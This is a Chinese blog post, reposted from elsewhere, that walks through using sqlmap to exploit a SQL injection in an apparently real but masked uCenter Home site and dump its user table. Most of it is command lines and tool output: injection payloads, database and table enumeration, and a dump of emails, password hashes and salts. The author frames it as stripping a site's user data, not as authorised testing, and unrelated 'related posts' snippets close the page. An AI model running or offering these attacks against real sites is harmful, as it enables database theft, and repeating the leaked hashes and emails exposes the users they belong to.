2012-2-10 22:06 Friday用sqlmap来扒下她的内裤吧~

这久十分流行各种扒裤,虽说一般来说都是拿下站以后再用脚本脱,但是有时候不得已可能也需要从注入点脱,这久离不开各种注入工具

杨凡写了穿山甲怎么脱,sqlmap脱裤本来是07写的,我曾经用她脱过,先简单写一个,呵呵

好吧,用一个真实的注入地址来演示(和谐过)

看命令记录:

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 17:06:11

[17:06:11] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file

[17:06:11] [INFO] testing connection to the target url

[17:06:13] [INFO] testing if the url is stable, wait a few seconds

[17:06:14] [INFO] url is stable

[17:06:14] [INFO] testing if GET parameter 'uid' is dynamic

[17:06:14] [INFO] confirming that GET parameter 'uid' is dynamic

[17:06:15] [WARNING] GET parameter 'uid' is not dynamic

[17:06:15] [INFO] heuristic test shows that GET parameter 'uid' might be injectable (possible DBMS: MySQL)

[17:06:15] [INFO] testing sql injection on GET parameter 'uid'

[17:06:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[17:06:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[17:06:18] [INFO] GET parameter 'uid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable

[17:06:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[17:06:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[17:07:18] [INFO] GET parameter 'uid' is 'MySQL > 5.0.11 AND time-based blind' injectable

[17:07:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[17:07:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

GET parameter 'uid' is vulnerable. Do you want to keep testing the others? [y/N] N

sqlmap identified the following injection points with a total of 34 HTTP(s) requests:

---

Place: GET

Parameter: uid

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM informati

on_schema.tables GROUP BY x)a)

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: uid=222 AND SLEEP(5)

---

[17:07:26] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.16, Apache 2.2.17

back-end DBMS: MySQL 5.0

[17:07:26] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'

[*] shutting down at: 17:07:26

注意红色的字,说明参数uid存在注入。好吧,发现代码和颜色不能叠加,注意这里:GET parameter 'uid' is vulnerable.

好接下来列出所有数据库:

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 17:08:57

[17:08:57] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file

[17:08:57] [INFO] resuming injection data from session file

[17:08:57] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[17:08:57] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: uid

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM informati

on_schema.tables GROUP BY x)a)

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: uid=222 AND SLEEP(5)

---

[17:08:59] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.16, Apache 2.2.17

back-end DBMS: MySQL 5.0

[17:08:59] [INFO] fetching database names

[17:08:59] [INFO] the SQL query used returns 4 entries

[17:09:00] [INFO] retrieved: information_schema

[17:09:00] [INFO] retrieved: mysql

[17:09:00] [INFO] retrieved: test

[17:09:00] [INFO] retrieved: ucenter

available databases [4]:

[*] information_schema

[*] mysql

[*] test

[*] ucenter

[17:09:00] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'

[*] shutting down at: 17:09:00

红色部分即是列出的数据库(木有颜色,就是available databases [4]:那里),然后设定数据库,列出表:

C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter --tables

结果就不弄出来了,表太多,直接看列出表uc_members的字段名(uchome用户数据都在这里,要扒的就是这个,嘿嘿):

C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter -T uc_members --columns

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 17:11:44

[17:11:44] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file

[17:11:44] [INFO] resuming injection data from session file

[17:11:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[17:11:44] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: uid

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FL

on_schema.tables GROUP BY x)a)

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: uid=222 AND SLEEP(5)

---

[17:11:46] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.16, Apache 2.2.17

back-end DBMS: MySQL 5.0

[17:11:46] [INFO] fetching columns for table 'uc_members' on database 'ucenter'

[17:11:46] [INFO] the SQL query used returns 12 entries

[17:11:46] [INFO] retrieved: uid

[17:11:47] [INFO] retrieved: mediumint(8) unsigned

[17:11:47] [INFO] retrieved: username

[17:11:47] [INFO] retrieved: char(32)

[17:11:47] [INFO] retrieved: password

[17:11:47] [INFO] retrieved: char(32)

[17:11:47] [INFO] retrieved: email

[17:11:48] [INFO] retrieved: char(32)

[17:11:48] [INFO] retrieved: myid

[17:11:48] [INFO] retrieved: char(30)

[17:11:48] [INFO] retrieved: myidkey

[17:11:48] [INFO] retrieved: char(16)

[17:11:48] [INFO] retrieved: regip

[17:11:49] [INFO] retrieved: char(15)

[17:11:49] [INFO] retrieved: regdate

[17:11:49] [INFO] retrieved: int(10) unsigned

[17:11:49] [INFO] retrieved: lastloginip

[17:11:49] [INFO] retrieved: int(10)

[17:11:49] [INFO] retrieved: lastlogintime

[17:11:50] [INFO] retrieved: int(10) unsigned

[17:11:50] [INFO] retrieved: salt

[17:11:50] [INFO] retrieved: char(6)

[17:11:50] [INFO] retrieved: secques

[17:11:50] [INFO] retrieved: char(8)

Database: ucenter

Table: uc_members

[12 columns]

+---------------+-----------------------+

| Column        | Type                  |

+---------------+-----------------------+

| email         | char(32)              |

| lastloginip   | int(10)               |

| lastlogintime | int(10) unsigned      |

| myid          | char(30)              |

| myidkey       | char(16)              |

| password      | char(32)              |

| regdate       | int(10) unsigned      |

| regip         | char(15)              |

| salt          | char(6)               |

| secques       | char(8)               |

| uid           | mediumint(8) unsigned |

| username      | char(32)              |

+---------------+-----------------------+

[17:11:51] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'

[*] shutting down at: 17:11:51

不用多说了吧,开始脱裤,我们只需要脱其中的一些字段,然后--threads把线程数调高,用--start和--stop设定要扒的记录范围,我们扒几条记录看看:

C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter -T uc_members -C uid,username,password,salt,email --dump --threads=10 --start=1 --stop=50

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 17:14:22

[17:14:22] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file

[17:14:22] [INFO] resuming injection data from session file

[17:14:22] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[17:14:22] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: uid

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM informati

on_schema.tables GROUP BY x)a)

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: uid=222 AND SLEEP(5)

---

[17:14:23] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.16, Apache 2.2.17

back-end DBMS: MySQL 5.0

[17:14:23] [INFO] fetching columns 'uid, username, password, salt, email' entries for table 'uc_members' on database 'ucenter'

[17:14:24] [INFO] retrieved: 2

[17:14:24] [INFO] retrieved: xx1@163.com

[17:14:24] [INFO] retrieved: 0a9c9d7451d0e78938747083add7fa5a

[17:14:24] [INFO] retrieved: 001c6f

[17:14:24] [INFO] retrieved: asdf@yeah.net

[17:14:25] [INFO] retrieved: 3

[17:14:25] [INFO] retrieved: xx086@163.com

[17:14:25] [INFO] retrieved: 02b3f6122a2882ffdd9ee9f12be60a6e

[17:14:25] [INFO] retrieved: 44d1f1

[17:14:25] [INFO] retrieved: x520@gmail.com

[17:14:25] [INFO] retrieved: 5

[17:14:25] [INFO] retrieved: xlyb@163.com

[17:14:26] [INFO] retrieved: 97226e4861d8e3251af4256781b78868

[17:14:26] [INFO] retrieved: 297944

[17:14:26] [INFO] retrieved: txen@vip.qq.com

[17:14:26] [INFO] retrieved: 73

[17:14:27] [INFO] retrieved: 0x40@qq.com

[17:14:27] [INFO] retrieved: 7e55a749a63c427a767cb1d9aa826f3b

[17:14:27] [INFO] retrieved: d84a57

[17:14:27] [INFO] retrieved: yx@126.com

[17:14:27] [INFO] retrieved: 74

[17:14:28] [INFO] retrieved: x540@qq.com

[17:14:28] [INFO] retrieved: 10bb282c88331c6e95d14700ba9390f0

[17:14:28] [INFO] retrieved: 589369

[17:14:28] [INFO] retrieved: hx@xxoo.org

[17:14:28] [INFO] retrieved: 75

[17:14:28] [INFO] retrieved: 0x840@qq.com

[17:14:29] [INFO] retrieved: 313bfb31b5cd6e58797291665a7b6ed1

[17:14:29] [INFO] retrieved: 229620

[17:14:29] [INFO] retrieved: fexg@xxoo.org

[17:14:29] [INFO] retrieved: 76

[17:14:29] [INFO] retrieved: 0.4.658940@qq.com

[17:14:29] [INFO] retrieved: 1846282a634da3c90af4e0250931b8c2

[17:14:30] [INFO] retrieved: da5025

[17:14:30] [INFO] retrieved: sxg@xxoo.org

[17:14:30] [INFO] retrieved: 77

[17:14:30] [INFO] retrieved: 0x6540@qq.com

[17:14:30] [INFO] retrieved: 8ff58083e52ad0b45c29daa6e6a92b82

[17:14:30] [INFO] retrieved: 024f42

[17:14:31] [INFO] retrieved: chfn@xxoo.org

[17:14:31] [INFO] retrieved: 78

[17:14:31] [INFO] retrieved: f4540@qq.com

[17:14:31] [INFO] retrieved: 46bbf0639b4195c4a5e0520f3d021315

[17:14:31] [INFO] retrieved: fed606

[17:14:31] [INFO] retrieved: rafg2@gmail.com

[17:14:32] [INFO] retrieved: 79

[17:14:32] [INFO] retrieved: 0.4.687540@qq.com

[17:14:32] [INFO] retrieved: 3de40cc0ba602a744eac8ec5a0da20d9

[17:14:32] [INFO] retrieved: ef16e8

[17:14:32] [INFO] retrieved: 123@123.com

[17:14:32] [INFO] retrieved: 80

[17:14:33] [INFO] retrieved: 0.474.6540@qq.com

[17:14:33] [INFO] retrieved: 2b70f5a5ada849ba5ef6fcdb8e04de82

[17:14:33] [INFO] retrieved: f1750c

[17:14:33] [INFO] retrieved: editfrc@xxoo.org

[17:14:33] [INFO] retrieved: 81

[17:14:33] [INFO] retrieved: f8dna@gmail.com

[17:14:34] [INFO] retrieved: 29ca2bc5046ebd4e84ae42e39ac1ed94

[17:14:34] [INFO] retrieved: 93d41a

[17:14:34] [INFO] retrieved: fanfg@xxoo.org

[17:14:34] [INFO] retrieved: 82

[17:14:34] [WARNING] user aborted during enumeration. sqlmap will display partial output

recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n

Database: ucenter

Table: uc_members

[12 entries]

+----------------------------+----------------------------------+--------+-----+--------------------------+

| email                      | password                         | salt   | uid | username                 |

+----------------------------+----------------------------------+--------+-----+--------------------------+

| xxoo@yeah.net         | 0a9c9d7451d0e78938747083add7fa5a | 001c6f | 2   | 0-9xx@163.com |

| xxoo@gmail.com        | 02b3f6122a2882ffdd9ee9f12be60a6e | 44d1f1 | 3   | 0.1086@163.com          |

| xxn@vip.qq.com      | 97226e4861d8e3251af4256781b78868 | 297944 | 5   | 0.1lx@163.com           |

| xxvv@126.com            | 7e55a749a63c427a767cb1d9aa826f3b | d84a57 | 73  | 0.x0@qq.com          |

| asdfasd@xxoo.org      | 10bb282c88331c6e95d14700ba9390f0 | 589369 | 74  | 0.x546540@qq.com       |

|xxg@xxoo.org    | 313bfb31b5cd6e58797291665a7b6ed1 | 229620 | 75  | 0.4.6xxx840@qq.com      |

| shi_ying@xxoo.org        | 1846282a634da3c90af4e0250931b8c2 | da5025 | 76  | 0.4xx940@qq.com        |

| chen_shan@xxoo.org       | 8ff58083e52ad0b45c29daa6e6a92b82 | 024f42 | 77  | 0xx6540@qq.com         |

| rafikixx@gmail.com | 46bbf0639b4195c4a5e0520f3d021315 | fed606 | 78  | 0x4540@qq.com       |

| 123@123.com                | 3de40cc0ba602a744eac8ec5a0da20d9 | ef16e8 | 79  | x40@qq.com        |

| editorc@xxoo.org         | 2b70f5a5ada849ba5ef6fcdb8e04de82 | f1750c | 80  | xxx@qq.com        |

| fangxg@xxoo.org     | 29ca2bc5046ebd4e84ae42e39ac1ed94 | 93d41a | 81  | 0xxa@gmail.com       |

+----------------------------+----------------------------------+--------+-----+--------------------------+

[17:14:39] [INFO] Table 'ucenter.uc_members' dumped to CSV file 'C:\sqlmap\output\user.xxoo.org\dump\ucenter\uc_members.csv'

[17:14:39] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'

看见了吧,都在一个csv文件里了,csv文件就是以逗号分割记录的文件,什么excel什么access什么mysql都可以往里面导,比穿山甲的html好吧,嘿嘿。截个图:

好了,就说这么点,sqlmap其实很强大,还是跨平台的哦,亲

转自 f4ck

PHP内裤,用sqlmap来扒下她的内裤吧~相关推荐

  1. 网站资源文件下载不了怎么办?一个方法教你如何轻松扒下

    日常生活中需要到网站上面进行资料查找,但是找到的资料又要付费才能进行下载,实在是太麻烦了.那如何快速轻松扒下? 下面教你两个方法,学会后网页上的内容任意复制. 小编使用的是百度浏览器,你也可以使用别的 ...

  2. SQLMap在windows下的安装、使用及进阶

    SQLMap 简要介绍 支持的数据库 支持的注入方式 其他功能 安装 SQLMap的使用 SQLMap的入门 判断是否存在注入 判断文本中的请求是否存在注入 查询当前用户下的所有数据库 获取数据库中的 ...

  3. 手慢无,阿里云神作被《Spring Boot进阶原理实战》成功扒下,限时

    又来给大家分享好书了:郑天民老师的 <Spring Boot进阶:原理.实战与面试题分析>,别问网上有没有开源版本!问就是我也不知道,哈哈!但我会有 郑天民是谁? 资深架构师和技术专家,有 ...

  4. 爬虫扒下 bilibili 视频信息

    B站算是对爬虫非常非常友好的网站啦! 修改转载已取得腾讯云授权 在以上两篇文章中我们已经在腾讯云服务器上搭建好了 Python 爬虫环境了,下一步就是在云服务器上爬上我们的爬虫,抓取我们想要的数据: ...

  5. 好慌!支付宝App现“不锈钢内裤” 官方解释:已改为“煮内裤的锅”

    今天轮到支付宝翻车了,尴尬中带了点好笑. 今天,有网友发现支付宝App的每日必抢栏目出现了名为"不锈钢内裤"的产品,这还真是看得有点让人懵圈的. 随后这名网友就@支付宝,调侃了一下 ...

  6. sqlmap自动扫描注入点_同天上降魔主,真是人间太岁神——SQLMAP 高级教程

    昨天对一个网站做渗透测试,本来想自己写脚本来sql注入的,但是觉得麻烦还是用了sqlmap 这一用发现sqlmap好多好玩的地方,以前用sqlmap 也就 -r -u ,觉得这样就够用了,直到昨天才发 ...

  7. 批量找注入 python3+sqlmap结合

    注入一直都是用sqlmap  导致本来就不怎么精通的手工注入现在就忘的一干二净 想实战练习  却一时又找不到有注入的网站   于是便有了这篇文章 想找个批量获取域名链接的工具   但都是只是获取域名而 ...

  8. IBatisNet的配置(SqlMap.config)

    IBatisNet DataMapper是通过XML文件来配置的,配置文件名称我们通常默认为SqlMap.Config,配置文件中指定了我们项目的数据库连接字符串,以及数据库表的映射文件等等. 下面我 ...

  9. 美国电子烟走向规范化,“下一站”是中国?

    文 | 曾响铃 来源 | 科技向令说(xiangling0815) 近日,有关电子烟的相关新闻再上头条,据央视新闻报道,国家烟草专卖局.国家市场监督管理总局将继续推动电子烟监管工作深入开展,构建电子烟 ...

  10. 311运动(冰箱与内裤)的由来

    什么是311运动,冰箱和内裤具备怎样的关系 我想进来的诸位一定对标题感到十足的好奇--311可以理解,3月11日嘛.可是冰箱与内裤是几个意思?故事的开始发生在3月11日的傍晚.下班后,有一个同事和我到 ...

最新文章

  1. 笔记本蓝牙显示输入码无效_如何凭借一把键盘游走桌面?米物蓝牙双模键盘
  2. EdgeGallery — MEP — 系统架构
  3. 项目整体管理:指导和管理项目工作
  4. 基线_电离层、对流层改正模型对基线解算的影响
  5. libvirtError: 无效参数:could not find capabilities for domaintype=kvm
  6. 快速掌握MATLAB应用,只要从这一步开始!
  7. java中实现将一个数字字符串转换成逗号分隔的数字串, 即从右边开始每三个数字用逗号分隔
  8. sql注入攻击和PreparedStatement有效防止sql注入攻击
  9. C语言不调用库函数画直线
  10. Passing the Message(HDU-3410)
  11. 检测浏览器是否支持ajax ===小代码
  12. Mac AI技术图像编辑软件:Luminar Neo
  13. [摘录]第5章 谈判原则
  14. paip.java 线程无限wait的解决
  15. Linux 内核下载地址
  16. pikachu逻辑漏洞实验
  17. Unity Shader :实现漫反射与高光反射
  18. 如何在IDM中设置代理服务器
  19. 全向轮机器人运动学分析
  20. 【Linux修炼】开篇

热门文章

  1. 如何删除管理员也无法删除的文件夹
  2. 人口流向数据_中国人口流动数据挖掘分析云平台
  3. DevOps 小组运维管理手册
  4. tedu斌-Web笔记2112-2
  5. RocketMQ事务消息学习及刨坑过程
  6. html保持div长宽比例,div自适应宽高保持比例不变
  7. bzoj4134 ljw和lzr的hack比赛 trie树合并
  8. SpringBoot-SSMP超详细整合案例
  9. 阿里云ECS服务器很多台共用一个公网ip吗?
  10. 网络安全运营能力建设